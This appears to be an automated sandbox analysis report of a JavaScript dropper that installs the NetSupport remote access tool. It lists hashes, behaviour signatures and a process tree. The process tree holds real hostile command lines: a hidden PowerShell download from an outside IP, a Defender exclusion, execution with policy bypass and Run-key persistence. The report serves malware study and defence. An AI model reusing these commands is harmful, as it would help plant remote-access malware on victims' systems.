Analysis
-
max time kernel: 143s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27/05/2023, 08:56
Static task: static1
Behavioral task: behavioral1
  Sample: 02303299.js
  Resource: win7-20230220-en
Behavioral task: behavioral2
  Sample: 02303299.js
  Resource: win10v2004-20230220-en
General
-
Target: 02303299.js
Size: 1KB
MD5: c80a26b806b3486c6157d8904c2e13e7
SHA1: 54d8be3eb5bdd4a788dcef3265cab6c314be1ccc
SHA256: 64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
SHA512: 4b7c084016a3fb20ae5b95c51c0459c327b163f0d7d942d931182009cd4bde50f24a867d7e60b62a6801189bcb4bba425b474e85b009ccb27e88bc3af6f59200
Malware Config
-
Extracted: http://golden-scalen.com/ngg_cl.zip
Signatures
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5020 | 1364 | cmd.exe | 32
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 936 | 1364 | cmd.exe | 32
-
Blocklisted process makes network request (2 IoCs)
flow | pid | Process
3 | 4280 | wscript.exe
13 | 3844 | powershell.exe
-
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation | cmd.exe
-
Executes dropped EXE (1 IoCs)
pid | Process
4768 | client32.exe
-
Loads dropped DLL (6 IoCs)
pid | Process
4768 | client32.exe
4768 | client32.exe
4768 | client32.exe
4768 | client32.exe
4768 | client32.exe
4768 | client32.exe
-
Adds Run key to start application (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VCRuntmeLib_1 = "C:\\Users\\Admin\\AppData\\Roaming\\VCRuntmeLib_1\\client32.exe" | powershell.exe
-
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings | cmd.exe
-
Opens file in notepad (likely ransom note) (1 IoCs)
pid | Process
3920 | NOTEPAD.EXE
-
Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid | Process
3844 | powershell.exe
3844 | powershell.exe
4976 | powershell.exe
4976 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3844 | powershell.exe
Token: SeDebugPrivilege | 4976 | powershell.exe
-
Suspicious use of WriteProcessMemory (11 IoCs)
description | pid | Process | procid_target
PID 5020 wrote to memory of 3540 | 5020 | cmd.exe | 88
PID 5020 wrote to memory of 3540 | 5020 | cmd.exe | 88
PID 3540 wrote to memory of 3844 | 3540 | cmd.exe | 90
PID 3540 wrote to memory of 3844 | 3540 | cmd.exe | 90
PID 936 wrote to memory of 3920 | 936 | cmd.exe | 91
PID 936 wrote to memory of 3920 | 936 | cmd.exe | 91
PID 3540 wrote to memory of 4976 | 3540 | cmd.exe | 92
PID 3540 wrote to memory of 4976 | 3540 | cmd.exe | 92
PID 4976 wrote to memory of 4768 | 4976 | powershell.exe | 101
PID 4976 wrote to memory of 4768 | 4976 | powershell.exe | 101
PID 4976 wrote to memory of 4768 | 4976 | powershell.exe | 101
Processes
-
[1] C:\Windows\system32\wscript.exe
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\02303299.js
    PID: 4280
    - Blocklisted process makes network request
-
[1] C:\Windows\system32\cmd.exe
    Command line: cmd /c start /MIN C:\ProgramData\BLD.bat
    PID: 5020
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat
        PID: 3540
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: PowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";
            PID: 3844
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell.exe -nop -w hidden -ep bypass C:\ProgramData\archive.ps1
            PID: 4976
            - Adds Run key to start application
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            [4] C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe
                Command line: "C:\Users\Admin\AppData\Roaming\VCRuntmeLib_1\client32.exe"
                PID: 4768
                - Executes dropped EXE
                - Loads dropped DLL
-
[1] C:\Windows\system32\cmd.exe
    Command line: cmd /c start C:\ProgramData\zayavka2.txt
    PID: 936
    - Process spawned unexpected child process
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\NOTEPAD.EXE
        Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt
        PID: 3920
        - Opens file in notepad (likely ransom note)
-
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize: 322B
MD5: 018d63793042f588a85968475d98decf
SHA1: 2c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256: afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512: ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a
-
Filesize: 905B
MD5: 50dc5faa02227c0aefa8b54c8e5b2b0d
SHA1: 27fe39b6b053685d4c781a7fa809840ebaab15d7
SHA256: aafc02e9f9c6ce1e9ff7aff753e5656d3d26041e06b78a9fd60ca6fe5127e09b
SHA512: 5bb8701fa6b026e99a8f269b89660ee8abba7c88a654f756d455a13e418a29c75e1742278046985bcc599151f0838591ef58ae8f742016153e43c8c5a78da442
-
Filesize: 1KB
MD5: 6cea5f86700d707b53b8f4a67d1ccf29
SHA1: 37e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA256: 6e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512: d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29
-
Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize: 1KB
MD5: 02a1a26525c65a359d41483180eaa6f7
SHA1: c0e2578b92d20e925c1c87016d1a9fccee1ec56f
SHA256: d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e
SHA512: d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize: 320KB
MD5: 2d3b207c8a48148296156e5725426c7f
SHA1: ad464eb7cf5c19c8a443ab5b590440b32dbc618f
SHA256: edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796
SHA512: 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c
-
Filesize: 18KB
MD5: a0b9388c5f18e27266a31f8c5765b263
SHA1: 906f7e94f841d464d4da144f7c858fa2160e36db
SHA256: 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a
SHA512: 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd
-
Filesize: 3.6MB
MD5: 00587238d16012152c2e951a087f2cc9
SHA1: c4e27a43075ce993ff6bb033360af386b2fc58ff
SHA256: 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
SHA512: 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226
-
Filesize: 101KB
MD5: c4f1b50e3111d29774f7525039ff7086
SHA1: 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256: 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512: 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize: 101KB
MD5: c4f1b50e3111d29774f7525039ff7086
SHA1: 57539c95cba0986ec8df0fcdea433e7c71b724c6
SHA256: 18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d
SHA512: 005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5
-
Filesize: 755KB
MD5: 0e37fbfa79d349d672456923ec5fbbe3
SHA1: 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512: 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize: 755KB
MD5: 0e37fbfa79d349d672456923ec5fbbe3
SHA1: 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512: 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630
-
Filesize: 32KB
MD5: dcde2248d19c778a41aa165866dd52d0
SHA1: 7ec84be84fe23f0b0093b647538737e1f19ebb03
SHA256: 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917
SHA512: c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166